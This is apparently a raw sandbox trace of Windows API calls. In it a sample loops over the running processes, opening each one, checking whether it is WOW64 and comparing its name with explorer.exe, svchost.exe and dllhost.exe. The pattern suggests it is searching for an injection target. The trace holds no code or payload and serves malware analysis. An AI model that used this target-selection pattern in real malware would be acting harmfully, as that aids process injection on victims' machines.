OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0229.069] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.069] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.069] CloseHandle (hObject=0xec) returned 1 [0229.069] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0229.069] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0229.070] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0229.070] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0229.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0229.070] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.070] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.070] CloseHandle (hObject=0xec) returned 1 [0229.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0229.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0229.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0229.070] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0229.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0229.071] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.071] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.071] CloseHandle (hObject=0xec) returned 1 [0229.071] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0229.071] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0229.071] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0229.071] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0229.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0229.071] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.071] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.072] CloseHandle (hObject=0xec) returned 1 [0229.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0229.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0229.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0229.072] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0229.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0229.072] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.072] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.072] CloseHandle (hObject=0xec) returned 1 [0229.072] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0229.072] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0229.072] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0229.072] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0229.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0229.073] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.073] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.073] CloseHandle (hObject=0xec) returned 1 [0229.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0229.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0229.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0229.073] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0229.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0229.074] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.074] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.074] CloseHandle (hObject=0xec) returned 1 [0229.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0229.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0229.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0229.074] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0229.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0229.074] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.074] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.074] CloseHandle (hObject=0xec) returned 1 [0229.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0229.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0229.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0229.074] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0229.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0229.075] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.075] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.075] CloseHandle (hObject=0xec) returned 1 [0229.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0229.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0229.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0229.075] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0229.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0229.076] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.076] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.076] CloseHandle (hObject=0xec) returned 1 [0229.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0229.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0229.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0229.076] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0229.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0229.076] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.076] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.076] CloseHandle (hObject=0xec) returned 1 [0229.076] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0229.076] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0229.077] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0229.077] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0229.077] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0229.078] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0229.078] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0229.079] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0229.079] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0229.080] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.080] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.080] CloseHandle (hObject=0xec) returned 1 [0229.080] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0229.080] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.080] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.080] CloseHandle (hObject=0xec) returned 1 [0229.081] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0229.081] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0229.082] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.082] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.082] CloseHandle (hObject=0xec) returned 1 [0229.082] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0229.082] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0229.082] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.082] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.082] CloseHandle (hObject=0xec) returned 1 [0229.082] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.083] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0229.083] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.083] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0229.083] CloseHandle (hObject=0xec) returned 1 [0229.083] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0229.084] CloseHandle (hObject=0xe8) returned 1 [0229.084] Sleep (dwMilliseconds=0x3e8) [0230.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0230.095] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0230.095] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0230.096] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0230.096] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0230.097] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0230.097] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0230.098] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0230.098] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0230.099] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0230.099] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0230.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0230.100] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0230.100] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0230.101] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0230.101] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0230.102] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0230.102] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0230.103] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0230.103] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0230.104] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0230.104] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.104] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.104] CloseHandle (hObject=0xec) returned 1 [0230.104] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0230.105] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0230.105] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.105] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0230.105] CloseHandle (hObject=0xec) returned 1 [0230.105] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0230.106] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.106] OpenProcess 